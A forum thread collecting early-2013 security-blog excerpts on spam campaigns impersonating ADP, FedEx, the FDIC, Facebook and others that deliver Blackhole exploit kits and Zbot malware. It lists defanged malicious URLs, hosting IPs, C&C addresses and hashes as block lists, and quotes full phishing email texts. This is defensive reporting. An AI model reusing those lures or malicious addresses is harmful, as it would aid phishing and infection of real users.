Fake Corporate eFax SPAM / 13.carnovirious .net
- http://blog.dynamoo....viriousnet.html
23 Jan 2013 - "This spam is leading to malware on 13.carnovirious .net, a domain spotted earlier today.. but one that has switched server to 74.91.117.49 since then... The spam leads to an exploit kit on [donotclick]13.carnovirious .net/read/persons_jobs.php hosted on 74.91.117.49 by Nuclear Fallout Enterprises. You should probably block 74.91.117.50 as well..."
(More detail at the dynamoo URL above.)
___

Fake USPS SPAM / euronotedetector .net
- http://blog.dynamoo....etectornet.html
23 Jan 2013 - "This fake USPS spam leads to malware on euronotedetector .net... The malicious payload is at [donotclick]euronotedetector .net/detects/updated_led-concerns.php hosted on the familiar IP address of 222.238.109.66 (Hanaro Telecome, Korea) which has been used in several recent attacks..."
(More detail at the dynamoo URL above.)
___

Fake BT Business SPAM / esenstialin .ru
- http://blog.dynamoo....nstialinru.html
23 Jan 2013 - "This fake BT Business spam leads to malware on esenstialin .ru... The malicious payload is on [donotclick]esenstialin .ru:8080/forum/links/column.php hosted on the following IPs:
50.31.1.104 (Steadfast Networks, US)
91.224.135.20 (Proservis UAB, Lithunia)..."
(More detail at the dynamoo URL above.)
___

Something evil on 74.91.117.50
- http://blog.dynamoo....-749111750.html
23 Jan 2013 - "OK, I can see just two malicious domains on 74.91.117.50 but they are currently spreading an exploit kit through this spam run. The domain is allocated to Nuclear Fallout Enterprises who often seem to host malware sites like this, so there's a good chance that more evil will turn up on this IP.
These are the domains that I can see right now:
13.blumotorada .net
13.carnovirious .net
The domains are registered wit these apparently fake details:
Glen Drobney office @glenarrinera .com
1118 hagler dr / neptune bch
FL 32266 US
Phone: +1.9044019773
Since there will almost definitely be more malicious domains coming up on this IP, it is well worth blocking."
___

Fake ADP SPAM / elemikn .ru
- http://blog.dynamoo....-elemiknru.html
22 Jan 2013 - "This fake ADP spam potentially leads to malware on elemikn .ru:
Date: Tue, 22 Jan 2013 12:25:06 +0100
From: LinkedIn [welcome @linkedin .com]
Subject: ADP Immediate Notification
ADP Immediate Notification
Reference #: 815979361
Tue, 22 Jan 2013 12:25:06 +0100
Dear ADP Client
Your Transfer Record(s) have been created at the web site:
https ://www .flexdirect .adp .com/client/login.aspx
Please see the following notes:
Please note that your bank account will be debited within one banking business day for the amount(s) shown on the report(s).
Please do not respond or reply to this automated e-mail. If you have any questions or comments, please Contact your ADP Benefits Specialist.
This note was sent to acting users in your system that approach ADP Netsecure.
As usual, thank you for choosing ADP as your business affiliate!
Ref: 286532564
HR. Payroll. Benefits.
The ADP logo and ADP are registered trademarks of ADP, Inc.
In the business of your success is a service mark of ADP, Inc.
© 2013 ADP, Inc. All rights reserved.

The malicious payload is at [donotclick]elemikn .ru:8080/forum/links/column.php but at the moment the domain does not seem to be resolving (which is a good thing!)
___

Fake "Batch Payment File Reversed" SPAM / kendallvile .com
- http://blog.dynamoo....ersed-spam.html
22 Jan 2013 - "This spam leads to malware on kendallvile .com:
From: batchservice @eftps .net [batchservice @eftps .net]
Date: 22 January 2013 17:56
Subject: Batch Payment File Reversed
=== PLEASE NOT REPLY TO THIS MESSAGE===
[redacted]
This notification was mailed to inform you that your payment file has Reversed. 2013-01-21-9.56.22.496135
Detailed information is accessible by sign into the Batch Provider with this link.
--
With Best Regards,
EFTPS
Contact Us: EFTPS Batch Provider Customer Service

This leads to an exploit kit on [donotclick]kendallvile .com/detects/exceptions_authority_distance_disturbing.php (report here*) hosted on the very familiar IP address of 222.238.109.66 (Hanaro Telecom, Korea) which should be blocked if you can."
* http://www.urlquery....t.php?id=802578

Edited by AplusWebMaster, 23 January 2013 - 02:21 PM.

[AplusWebMaster]

FYI...

Fake Flash Updates - via SPAM attachment...
- http://www.gfi.com/b...ces-in-the-web/
Jan 24, 2013 - "Following the return of fake Google Chrome browser updates almost two weeks ago, online criminals are now banking on fake Adobe Flash Player updates to lure the unwary user into downloading malware onto their system... spam emails claiming to be from the Better Business Bureau (BBB) and eFax Corporate... The BBB email contains an attachment that is found to be a Pony downloader that, once opened, downloads a variant of the ZeuS banking Trojan onto the affected user’s system. The said downloader also steals various passwords related to FTP sites..."
(Screenshots available at the gfi URL above.)
___

Malicious BT SPAM
- http://www.gfi.com/b...ing-in-inboxes/
Jan 24, 2013 - "... if you’re a client of the BT (British Telecom) Group, be warned that there is a new spam campaign under the guise of a “Notice of Delivery” mail* pretending to originate from BT Business Direct... Once users download and open the attached HTM file, they are -redirected- to a Russian website the file calls back to. The website serves a Blackhole Exploit Kit, which then downloads Cridex once it finds a software vulnerability..."
* http://gfisoftware.t...attachment-spam
___

Fake ADP SPAM / 14.sofacomplete .com
- http://blog.dynamoo....ompletecom.html
24 Jan 2013 - "This fake ADP spam leads to malware on 14.sofacomplete .com:
From: Erna_Thurman @ADP .com Date: 24 January 2013 17:48
Subject: ADP Generated Message: Final Notice - Digital Certificate Expiration
This e-mail has been sent from an automated system. PLEASE DO NOT REPLY. If you have any questions, please contact your administrator for assistance.
Digital Certificate About to Expire
The digital certificate you use to access ADP's Internet services is about to expire. If you do not renew your certificate by the expiration date below, you will not be able to access ADP's Internet services.
Days left before expiration: 1
Expiration date: Jan 25 23:59:59 GMT-03:59 2013
Renewing Your Digital Certificate
1. Go to this URL: https ://netsecure.adp .com/pages/cert/register2.jsp
2. Follow the instructions on the screen.
3. Also you can download new digital certificate at https ://netsecure.adp .com/pages/cert/pickUpCert.faces.
Deleting Your Old Digital Certificate
After you renew your digital certificate, be sure to delete the old certificate. Follow the instructions at the end of the renewal process.

The malicious payload is at [donotclick]14.sofacomplete .com/read/saint_hate-namely_fails.php hosted on 73.246.103.26 (Comcast, US). There will probably be other malicious domains on this same IP, so blocking it may be useful."
___

Fake LinkedIn emails lead to client-side exploits and malware
- http://blog.webroot....ts-and-malware/
Jan 24, 2013 - "... Over the past 24 hours, cybercriminals have launched yet another massive spam campaign, impersonating LinkedIn, in an attempt to trick its users into clicking on the malicious links found in the bogus “Invitation Notification” themed emails. Once they click on the links, users are automatically exposed to the client-side exploits served by the Black Hole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog....exploit_kit.png
... Name servers used by these malicious domains:
Name server: ns1.http-page .net – 31.170.106.17 – Email: ezvalue @yahoo .com
Name server: ns2.http-page .net – 7.129.51.158 – Email: ezvalue @yahoo .com
Name Server: ns1.high-grades .com – 208.117.43.145
Name Server: ns2.high-grades .com – 92.121.9.25
Sample malicious payload dropping URL:
hxxp ://shininghill .net/detects/solved-surely-considerable.php?vf=1o:31:1h:1l:2w&fe=33:1o:1g:1l:1m:1k:2v:1l:1o:32&n=1f&dw=w&qs=p
Upon successful client-side exploitation, the campaign drops MD5: fdc05614f56aca9421271887c1937f51 * ...Trojan-Spy.Win32.Zbot.ihgm.
Upon execution, the same creates the following process on the affected hosts:
%AppData%\Bytaa\yjdoly.exe
The following registry keys:
HKEY_CURRENT_USER\Software\Microsoft\Rekime
... Once executed, the sample also attempts to establish multiple UDP connections with the following IPs:
177.1.100.2 :11709
190.33.36.175 :11404
213.109.254.122 :29436
41.69.182.117 :29817
64.219.114.114 :13503
161.184.174.65 :14545
93.177.174.72 :10119
69.132.202.147 :16149..."
(More detail at the webroot URL above.)
* https://www.virustot...5b58d/analysis/
File name: info.ex_
Detection ratio: 30/44
Analysis date: 2013-01-23
___

Fake pharma sites 24/1/13
- http://blog.dynamoo....ites-24113.html
24 Jan 2013 - "Here's an updated list of fake RX sites being promoted through vague spam like this:
Date: Thu, 24 Jan 2013 04:44:45 +0000 (GMT)
From: "Account Info Change" [noreply@etraxx.com]
Subject: Updated information
Attention please:
- Over 50 new positions added (view recently added products)
- Free positions included with all accounts (read more here)
- The hottest products awaiting you in the first weeks of the new year (read more here)
- We want you to feel as comfortable as possible while you?re at our portal.
Click Here to Unsubscribe

As with a few days ago, these sites are hosted on:
199.59.56.59 (Hostwinds, Australia)
209.236.67.220 (WestHost Inc, US)
Currently active spamvertised sites are as follows:
(Long list available at the dynamoo URL above.)
___

Fake Efax Corporate SPAM / epimarkun .ru
- http://blog.dynamoo....pimarkunru.html
24 Jan 2013 - "This fake eFax spam leads to malware on epimarkun .ru:
Date: Thu, 24 Jan 2013 04:04:42 +0600
From: Habbo Hotel [auto-contact@habbo.com]
Subject: Efax Corporate
Attachments: Efax_Corporate.htm
Fax Message [Caller-ID: 963153883]
You have received a 28 pages fax at Thu, 24 Jan 2013 04:04:42 +0600, (157)-194-4168.
* The reference number for this fax is [eFAX-009228416].
View attached fax using your Internet Browser.
� 2013 j2 Global Communications, Inc. All rights reserved.
eFax � is a registered trademark of j2 Global Communications, Inc.
This account is subject to the terms listed in the eFax � Customer Agreement.

There is an attachment called Efax_Corporate.htm leading to a malicious payload at [donotclick]epimarkun .ru:8080/forum/links/column.php which is hosted on the following IPs:
50.31.1.104 (Steadfast Networks, US)
94.23.3.196 (OVH, France)
202.72.245.146 (Mongolian Railway Commercial Center, Mongolia)
These IPs and domains are all malicious:
50.31.1.104
94.23.3.196
202.72.245.146
dmssmgf .ru
esekundi .ru
esenstialin .ru
disownon .ru
epimarkun .ru
damagalko .ru
dumarianoko .ru
epiratko .ru
dfudont .ru ..."

Edited by AplusWebMaster, 24 January 2013 - 05:07 PM.

[AplusWebMaster]

FYI...

Chase Phish, LinkedIn, American Express Open and Verizon Wireless Spam
- http://www.gfi.com/b...-wireless-spam/
Jan 25, 2013 - "In this week’s Email Threats roundup, we are highlighting spam and phishing campaigns that have made a comeback, such as LinkedIn and Chase spam, but took advantage of different social engineering lures this time around. You Know It’s Awkward When… you receive an email notification that claims to originate from LinkedIn, saying you have an event invitation from one of your employees; however, (1) you don’t own a company and (2) you don’t have people under you that you can call “employees.” Furthermore, isn’t LinkedIn Events the latest thing-of-the-past?... these don’t matter now. What does matter is that recipients should not click any of the malicious links in the message body as they lead to serious system infections..."
- http://gfisoftware.t...edentials-phish
- http://gfisoftware.t...s-linkedin-spam
- http://gfisoftware.t...press-open-spam
- http://gfisoftware.t...n-wireless-spam
___

Fake Craigslist fax-to-email...
- http://techblog.avir...tifications/en/
Jan 25, 2013 - "If you receive such a message containing an HTML page attached, don’t open it. The email pretends to come from “craigslist – automated message, do not reply <robot @craigslist .org>” and has the subject ”Efax Corporate”...
> http://techblog.avir...fax-malware.jpg
... contains a malicious java script code which would download malware on your computer.
> http://techblog.avir...ist-malware.jpg ..."
___

Fake UPS SPAM / eziponoma .ru
- http://blog.dynamoo....ziponomaru.html
25 Jan 2013 - "This fake UPS spam leads to malware on eziponoma .ru:
From: messages-noreply @bounce .linkedin .com... On Behalf Of LinkedIn Password
Sent: 25 January 2013 04:12
Subject: UPS Tracking Number H0931698016
You can use UPS Services to:
Ship Online
Schedule a Pickup
Open a UPS Services Account
Welcome to UPS .com Customer Services
Hi, [redacted].
DEAR CLIENT , RECIPIENT'S ADDRESS IS WRONG
PLEASE PRINT OUT THE INVOICE COPY ATTACHED AND COLLECT THE PACKAGE AT OUR DEPARTMENT.
With Respect , Your UPS Customer Services...

The malicious payload is at [donotclick]eziponoma .ru:8080/forum/links/column.php which is hosted on:
94.23.3.196 (OVH, France)
195.210.47.208 (PS Internet Company, Kazakhstan)
202.72.245.146 (Railcom, Mongolia)"
___

Fake FedEx SPAM / vespaboise .net
- http://blog.dynamoo....paboisenet.html
25 Jan 2013 - "This fake FedEx spam leads to malware on vespaboise .net:
Date: Fri, 25 Jan 2013 15:39:33 +0200
From: services @fedex .com
Subject: FedEx Billing - Bill Prepared to be Paid
FedEx Billing - Bill Prepared to be Paid
fedex.com
[redacted]
You have a new invoice(s) from FedEx that is prepared for discharge.
The following invoice(s) are ready for your overview:
Invoice Number
Invoice Amount
2-649-22849
49.81
1-181-19580
257.40
To pay or overview these invoices, please log in to your FedEx Billing Online account proceeding this link: http ://www.fedex .com/us/account/fbo
Note: Please do not use this email to submit payment. This email may not be used as a remittance notice. To pay your invoices, please visit FedEx Billing Online, http ://www.fedex .com/us/account/fbo
Thank you,
Revenue Services
FedEx
Please Not try to reply to this message. auto informer system cannot accept incoming mail.
The content of this message is protected by copyright and trademark laws under U.S. and international law.
review our privacy policy . All rights reserved.

The malicious payload is at [donotclick]vespaboise .net/detects/invoice_overview.php which is on the very familiar IP address of 222.238.109.66 (Hanaro Telecom, Korea) which has been used in several recent attacks.. blocking it would be prudent."
___

Blackhole exploit kit - distribution
- http://www.symantec....new-spam-affair
Jan 24, 2013 - "... -redirect- ... to the following malicious URL:
dfudont .ru :8080/[REMOVED]/column.php...
BlackHole v2 exploit kit, and our telemetry data indicates that we have detected the following signatures from the malicious URL:
Web Attack: Blackhole Exploit Kit Website 8
Web Attack: Blackhole Exploit Kit
Web Attack: Blackhole Functions
Web Attack: Blackhole Toolkit Website 20
Web Attack: Blackhole Toolkit Website 31...
Heatmap distribution for IPS detections associated with Blackhole exploit kit:
> https://www.symantec...s/image4_26.png
... If the Blackhole exploit is successful, W32.Cridex* is then downloaded onto the compromised computer... ensure operating systems and software are up to date and to avoid clicking on suspicious links while browsing the Internet or checking email."
* W32.Cridex: https://www.symantec...-012103-0840-99
W32.Cridex!gen1: https://www.symantec...-032300-4035-99

- http://centralops.ne...ainDossier.aspx - Jan 25, 2013
canonical name dfudont .ru
addresses: 94.23.3.196, 195.210.47.208, 202.72.245.146
domain: DFUDONT .RU
nserver: ns1.dfudont .ru. 62.76.185.169
nserver: ns2.dfudont .ru. 41.168.5.140
nserver: ns3.dfudont .ru. 42.121.116.38
nserver: ns4.dfudont .ru. 110.164.58.250
nserver: ns5.dfudont .ru. 210.71.250.131
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person...
country: FR
origin: AS16276
- https://www.google.c...c?site=AS:16276
"... over the past 90 days, 7886 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-01-25, and the last time suspicious content was found was on 2013-01-25... we found 458 site(s) on this network... that appeared to function as intermediaries for the infection of 3498 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 1447 site(s)... that infected 6601 other site(s)..."
- http://centralops.ne...ainDossier.aspx - Jan 27, 2013
canonical name dfudont .ru
addresses: 195.210.47.208, 202.72.245.146
domain: DFUDONT .RU ...
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person...
country: KZ - Kazakhstan
origin: AS48716
- https://www.google.c...c?site=AS:48716
"... over the past 90 days, 25 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-01-27, and the last time suspicious content was found was on 2013-01-27... we found 6 site(s) on this network... that appeared to function as intermediaries for the infection of 5 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 23 site(s)... that infected 965 other site(s)..."

Edited by AplusWebMaster, 27 January 2013 - 02:53 PM.

[AplusWebMaster]

FYI...

Bogus BBB emails spread Zbot...
- http://www.hotforsec...-zbot-5135.html
Jan 25, 2013 - "... Better Business Bureau spam campaign.... the e-mails infect people with a Trojan that steals sensitive information from recipients... the BBB attack consists of a message supposedly from the Better Business Bureau telling recipients that a business customer has filed a formal complaint against them. The bogus e-mail invites the recipient to reply and mend the situation, but not before they open the attached document that, depending on the campaign, hides a downloader, a password stealer, and a BlackHole component. The subject line of these messages generally read: “complaint report,” “complaint ID,” “case” and a set of random digits. The bogus e-mails used in the January campaign carry as an attachment a zip file named “case” and arbitrary signs that hide a password stealer and a downloader of ZBot – identified by Bitdefender as Trojan.Generic.KD.835502. To make it more believable, attackers deliver the exe file with the Adobe Reader icon, so if file extensions are hidden by the operating system, chances are you’ll mistake it for a PDF document...
> http://www.hotforsec...der-of-ZBot.png
ZBot is a banker Trojan that steals e-banking information and logs keystrokes, but also has some limited backdoor and proxy features that allows its masters to take control of the machine. Crooks seem to find the BBB scam highly rewarding, as they refresh it several times a year since it was first spotted in 2010. It was November 2012 when Bitdefender anti-spam lab signaled another huge wave of BBB scam spreading Trojan.Generic.8271699, a downloader awfully similar to the infamous BlackHole exploit pack... Organizations such as the Better Business Bureau NEVER send complaints via e-mail with attachments and links, exactly to avoid frauds. EXE files are a big no-no in e-mail messages. In fact, they are so dangerous that no company will e-mail you this kind of attachment. If your e-mail messages carry an exe file, just get rid of it..."
___

Super Bowl Scams ...
- https://www.bbb.org/...per-bowl-scams/
Jan 22, 2013 - "... be on the alert for knock-off team jerseys, counterfeit memorabilia and phony game tickets... Tickets for the big game can be an even bigger rip-off. There are thousands of Super Bowl tickets currently listed on Craig’s List, but the site offers no guarantees of any kind and does not require identification of its listers. Buying in person isn’t always an improvement, as it’s gotten easier and easier for scammers to make fake tickets that look real... In general, avoid scams by being -skeptical- of:
• Offers that sound “too good to be true”
• Pushy sales tactics
• Poor quality of merchandise
• Offers that require wire transfer of funds ..."
More: https://www.bbb.org/blog/
___

Phishing Scams use Facebook Info for Personalized SPAM
- https://www.bbb.org/...sonalized-spam/
Jan 25, 2013 - "... scammers are exploiting the fact that you’re more likely to click on a link if it was sent by a friend. Scammers find your information through Facebook or other social media accounts. Some set up fake accounts and send out friend requests. When you accept the request, they can view your friends and personal and contact information. Other scammers rely on social media users not locking down their privacy settings*, so basic information, such as your name, email address and friends’ names, is publicly available..."
* http://www.facebook....92235220834308/

Edited by AplusWebMaster, 27 January 2013 - 10:51 AM.

[AplusWebMaster]

FYI...

Bogus Paypal emails lead to BlackHole Exploit Kit
- http://blog.webroot....le-exploit-kit/
Jan 28, 2013 - "... Over the past 24 hours, cybercriminals have launched yet another spam campaign, impersonating PayPal, in an attempt to trick its users into thinking that they’ve received a “Transaction Confirmation“, which in reality they never really made. Once users click on -any- of the links found in the malicious emails, they’re exposed to the client-side exploits served by the Black Hole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog....exploit_kit.png
... Malicious domain name reconnaissance:
duriginal .net – 222.238.109.66 – Email: blackchromedesign2 @ymail .com
Name server: NS1.HTTP-PAGE .NET – 31.170.106.17 – Email: ezvalue @yahoo .com
Name server: NS2.HTTP-PAGE .NET – 7.129.51.158 – Email: ezvalue @yahoo .com
The campaign shares the same infrastructure... three of these campaigns have been launched by the same malicious party.
Upon successsful client-side exploitation, the campaign drops MD5: 423daf9994d552ca43f8958634ede6ee * ...Trojan-Spy.Win32.Zbot.ilmw..."
(More detail at the webroot URL above.)
* https://www.virustot...fe199/analysis/
File name: contacts.exe
Detection ratio: 25/46
Analysis date: 2013-01-28
___

Zbot sites to block - 28/1/13
- http://blog.dynamoo....lock-28113.html
28 Jan 2013 - "These domains and IPs are currently acting as C&C and distribution servers for Zbot. I would advise blocking these IPs and domains if you can. There are three parts to the list: IPs with hosting company names, plain IPs for copy-and-pasting and domains identified on these servers..."
(Long list at the dynamoo URL above.)
___

Fake Facebook SPAM / gonita .net
- http://blog.dynamoo....ebook-spam.html
28 Jan 2013 - "This fake Facebook spam leads to malware on gonita .net:
Date: Mon, 28 Jan 2013 17:30:50 +0100
From: "Facebook" [addlingabn2 @bmatter .com]
Subject: Most recent events on Facebook
facebook
Hi [redacted],
You have disabled your Facebook account. You can reveal your account whenever you wish by logging into Facebook with your old login email address and password. After that you will be able to enjoy the site in the same way as before.
Kind regards,
The Facebook Team
Log in to Facebook and start connecting
Sign in
Please use the link below to resume your account :
http ://www.facebook .com/resume/
This message was sent to [redacted]. If you don't want to receive these emails from Facebook in the future, please click: unsubscribe.
Facebook, Inc. Attention: Department 419 P.O Box 10007 Palo Alto CA 94301

The malicious payload is at [donotclick]gonita .net/detects/sign_on_to_resume.php (report here) hosted on the well-known IP of 222.238.109.66 (Hanaro Telecom, Korea)... malicious domains are active on the same IP..."

Edited by AplusWebMaster, 28 January 2013 - 04:13 PM.

[AplusWebMaster]

FYI...

Intelius SPAM (or is it a data breach?)
- http://blog.dynamoo....ata-breach.html
30 Jan 2013 - "This spam was sent to an email address only used for register for intelius.com . Either there has been a data breach at Intelius, or they have decided to go into the gambling business.
From: Grand Palace Slots [no-reply @tsm -forum .net]
Date: 30 January 2013 10:39
Subject: Try to play slots - 10$ free
Mailed-By: tsm-forum .net
Feel the unique excitement of playing at the world's premiere games!
Grand Palace gives you welcome package for slots up to 8,000$! What a fantastic offer, straight from the heart of World's gaming leader!
This is a great offer, especially when you see what else Grand Palace has to offer:
- US players welcome
- more than 100 fun games, realistic graphics
- the most secure and up-to-date software
- professional support staff to help you with whatever you might need, any time of the day or night!
And in the end we want to give you 10$ absolutelly free! (Use code CASH10)
Hurry up! Your free Grand Palace cash is waiting! Play Today!
http ://www .igrandpalacegold .com
Click here to opt out of this email:
http ://unsubscribe .igrandpalacegold .com

The originating IP is 176.200.202.100 (Telecom Italia, Italy), spamvertised site is www .igrandpalacegold .com on 91.217.52.125 (Fajncom SRO, Czech Republic)... I'm assuming that Intelius doesn't want to promote what would be illegal gambling for US citizens, which really leads just one other option.."
___

Fake FedEx emails lead to BlackHole Exploit Kit
- http://blog.webroot....le-exploit-kit/
Jan 29, 2013 - "... Cybercriminals are currently mass mailing tens of thousands of emails impersonating the company, in an attempt to trick its customers into clicking on exploits and malware dropping links found in the legitimate-looking emails...
Sample screenshot of the spamvertised email:
> https://webrootblog....exploit_kit.png
... Malicious domain name reconnaissance:
vespaboise.net – 222.238.109.66 – Email: blackchromedesign2 @ymail .com
Name Server: NS1.HTTP-PAGE .NET
Name Server: NS2.HTTP-PAGE .NET
... Upon successful client-side exploitation, the FedEx themed campaign drops MD5: c2f72ff5b0cf4dec4ce33e4cc65796b1 * ...PWS:Win32/Zbot.gen!AM.
... It also attempts to connect to the following IPs:
14.96.171.173, 64.219.114.114, 68.49.120.165, 70.50.58.41, 70.136.9.2, 71.42.56.253,
71.43.217.3, 72.218.14.223, 76.219.198.177, 80.252.59.142, 83.111.92.83, 87.5.135.46,
87.203.87.232, 98.71.136.168, 98.245.242.245, 108.83.233.190. 115.133.156.53,
151.66.19.166. 194.94.127.98, 206.45.59.85 ..."
(More detail at the webroot URL above.)
* https://www.virustot...bd1df/analysis/
File name: calc.exe
Detection ratio: 24/46
Analysis date: 2013-01-30
___

Malicious Spam Emails Target Nightclub Disaster in Santa Maria
- http://www.symantec....ter-santa-maria
Jan 30, 2013 - "... spammers are distributing malicious emails that attempt to lure users into viewing a video of the incident that killed 233 people recently in a horrific tragedy at a popular nightclub in Santa Maria, Brazil. The malicious email is in Portuguese and invites unsuspecting users to click on a link to watch a video of the tragedy. The link provided in the email downloads a zip file containing a malicious control panel file as well an executable file. Symantec detects this threat as Trojan Horse. Further analysis of the malicious file shows that the threat creates the following file:
%SystemDrive%\ProgramData\ift.txt
It also alters the registry entries for Internet Explorer. The threat then downloads an IE configuration file from a recently registered domain. Trojan Horse is usually a backdoor Trojan, downloader, or an infostealer. Samples of the spam emails are shown below (Figures 1 and 2). The email has the following characteristics:
Subject: Video mostra momento exato da tragedia em Santa Maria no Rio Grande Do Sul segunda-feira, 28 de janeiro de 2013
Subject: VIDEO DO ACIDENTE DA BOATE DE SANTA MARIA RS.
Translation: Video shows the beginning of the tragedy in Santa Maria, Rio Grande Do Sul Monday, January 28, 2013
Translation: Video of the Nightclub accident in Santa Maria RS
1) https://www.symantec...sterSpam1_0.png
2) https://www.symantec...sterSpam2_0.png
Users are advised to exercise caution when looking for videos, images, and news of recent popular events. Do not click on suspicious links or open attachments received in unsolicited emails. Keep your security software up-to-date in order to protect your information from online viruses and scams."
___

Fake FDIC SPAM / 1wstdfgh.organiccrap .com
- http://blog.dynamoo....niccrapcom.html
30 Jan 2013 - "Here's a slightly new spin on old spam, leading to malware on 1wstdfgh.organiccrap .com:
Date: Wed, 30 Jan 2013 16:16:32 +0200
From: "Тимур.Носков @fdic .gov" [midshipmanc631 @buprousa .com]
Subject: Important notice from FDIC
Attention!
Due to the adoption of a new security system, that is aimed at diminishing the number of cases of fraud and scams, all your ACH and WIRE transactions will be temporarily blocked until your security version meets the new requirements.. In order to restore your ability to make transactions, you are required to install a special security software. Please use the link below to download and install all the necessary files.
We apologize for causing you troubles by this measure.
If you need any assistance, please do not hesitate to contact us.
Sincerely yours,
Federal Deposit Insurance Corporation
Security Department

The link in the email goes through a legitimate hacked site (in this case [donotclick]www.edenespinosa .com/track .php?fdic) to the amusingly named [donotclick]1wstdfgh.organiccrap .com/closest/984y3fh8u3hfu3jcihei .php (report here*) hosted on 91.218.121.86 (CoolVDS / Kutcevol Maksum Mukolaevichm, US) which hosts the following suspect domains that you might want to block:
1wstdfgh.organiccrap .com
23v4tn6dgdr.organiccrap .com
v446numygjsrg.mymom .info
3vbtnyumv.ns02 .us
crvbhn7jbtd.mywww .biz "
* http://urlquery.net/...t.php?id=891059

Edited by AplusWebMaster, 30 January 2013 - 09:56 AM.

[AplusWebMaster]

FYI...

Fake FDIC SPAM / 123435jynfbdf.myWWW .biz
- http://blog.dynamoo....dfmywwwbiz.html
31 Jan 2013 - "More FDIC themed spam, leading to a malicious payload on the same IP as this one:
From: ".Афанасьев @fdic .gov" [mailto:dickysmv341 @homesextapes .com]
Sent: 30 January 2013 15:03
Subject: Changing security requirements
Importance: High
Dear Sirs,
In connection with the introduction of a new security system for the purpose of preventing new cases of wire fraud, all your account ACH and WIRE transactions will be temporarily blocked unless the special security requirements are met.. In order to fully re-establish your account, you are asked to install a special security software. Please open the link below to download and install the latest security version.
We apologize for the inconveniences caused to you by this measure.
Please do not hesitate to contact us if you have any questions.
Yours faithfully,
Federal Deposit Insurance Corporation
Security Department

In this case the malicious payload is at [donotclick]123435jynfbdf.myWWW .biz./closest/984y3fh8u3hfu3jcihei.php and is hosted on 91.218.121.86 (CoolVDS / Kutcevol Maksum Mukolaevichm, US). At the moment the following domains seem to be active:
123435jynfbdf.myWWW .biz
1wstdfgh.organiccrap .com
23v4tn6dgdr.organiccrap .com
v446numygjsrg.mymom .info
1wvrbtnytjtyjj.mymom .info
1ewgthytj.mymom .info
3vbtnyumv.ns02 .us
crvbhn7jbtd.mywww .biz
1dfcsdbnhgnnh.mywww .biz
13rehjkfr.mywww .biz
___

Malicious ‘Facebook Account Cancellation Request” themed emails serve client-side exploits and malware
- http://blog.webroot....ts-and-malware/
Jan 31, 2013 - "In December, 2012, we intercepted a professional-looking email that was impersonating Facebook Inc. in an attempt to trick its users into thinking that they’ve received an “Account Cancellation Request“. In reality, once users clicked on the links, their hosts were automatically exploited through outdated and already patched client-side vulnerabilities, which dropped malware on the affected PCs. Over the past 24 hours, cybercriminals have resumed spamvertising tens of thousands of legitimate-looking Facebook themed emails, once again using the same social engineering theme...
Sample screenshot of the spamvertised email:
> https://webrootblog....its_malware.png
... Sample client-side exploits served: CVE-2010-0188; CVE-2011-3544; CVE-2010-0840
... Malicious domain name reconnaissance:
kidstoytowers .com – 62.75.181.220 – responding to the same IP is also the following domain – dailyfrontiernews .com
Upon successful client-side exploitation, the campaign drops MD5: 9356fcd388b4bae53cad7aea4127d966 * ...W32/Injector.YMS!tr..."
(More detail at the webroot URL above.)
* https://www.virustot...c5cbd/analysis/
File name: test53356736863192.bin
Detection ratio: 3/46
Analysis date: 2013-01-28
___

Fake American Airlines email
- http://msmvps.com/bl...25/1823091.aspx
Jan 25 2013 - "This is -not- a real American Airlines / American Eagle email:
> http://msmvps.com/cf...00_380EFE9A.png
These types of spoof emails still work, fooling too many people. As always, if you hover your mouse cursor over the hyperlink it becomes easy to tell that the email is not legitimate.
> http://msmvps.com/cf...00_21200751.png
___

Dear Facebook, this change sucks
- http://msmvps.com/bl...03/1822008.aspx
Jan 3 2013 - "1. I don’t want to receive emails (aka most likely SPAM) from strangers.
> http://msmvps.com/cf...00_15139385.png
2. Your “control who can send you messages” link is broken.
> http://msmvps.com/cf...00_7E249C3B.png

> http://msmvps.com/cf...00_2B09D94A.png
Filed under: I ain't happy about this*...
* http://msmvps.com/bl...0_/default.aspx

Edited by AplusWebMaster, 31 January 2013 - 07:44 PM.

[AplusWebMaster]

FYI...

Fake Booking .com ‘Credit Card was not Accepted’ emails lead to malware
- http://blog.webroot....ead-to-malware/
Feb 1, 2013 - "Cybercriminals are mass mailing tens of thousands of emails, impersonating Booking .com, in an attempt to trick its users into thinking that their credit card was not accepted. Users are then urged to click on a fake “Print Booking Details” link, which leads them to the malware used in the campaign...
Sample screenshot of the spamvertised email:
> https://webrootblog....pam_malware.png
... Sample detection rate for the malicious executable: MD5: 75db84cfb0e1932282433cdb113fb689 * ... TrojanDownloader:Win32/Kuluoz.B...
Once executed, the sample phones back to the following command and control (C&C) servers:
hxxp:// 66.232.145.174 :6667...
hxxp:// 175.45.142.15 :8080...
hxxp:// 66.84.10.68 :8080...
hxxp:// 202.169.224.202 :8080...
hxxp:// 89.19.20.202 :8080...
hxxp:// 74.208.111.15 :8080...
hxxp:// 85.214.50.161 :8080
hxxp:// 184.106.214.159 :8080
hxxp:// 46.4.178.174 :8080
hxxp:// 217.11.63.194 :8080
hxxp:// 82.113.204.228 :8080
hxxp:// 85.214.22.38 :8080
hxxp:// 202.153.132.24 :8080
hxxp:// 85.186.22.146 :8080
hxxp:// 77.79.81.166 :8080
hxxp:// 84.38.159.166 :8080
hxxp:// 81.93.248.152 :8080
hxxp:// 118.97.15.13 :8080 ...
More malware variants are known to have phoned back to the same IPs..."
(More detail at the webroot URL above.)
* https://www.virustot...sis/1359641226/
File name: BookingInfo.exe
Detection ratio: 26/46
Analysis date: 2013-01-31
___

Fake Photo SPAM / eghirhiam .ru
- http://blog.dynamoo....ghirhiamru.html
1 Feb 2013 - "Here's a tersely-worded Photos spam leading to malware on eghirhiam .ru:
Subject: Photos

Good day,
your photos here http: //www.jonko .com/photos.htm

As is usually the case, the malware -bounces- through a legitimate hacked site and in this case ends up at [donotclick]eghirhiam .ru:8080/forum/links/public_version.php (report here) hosted on:
82.148.98.36 (Qatar Telecom, Qatar)
195.210.47.208 (PS Internet Company Ltd, Kazakhstan)
202.72.245.146 (Railcom, Mongolia)
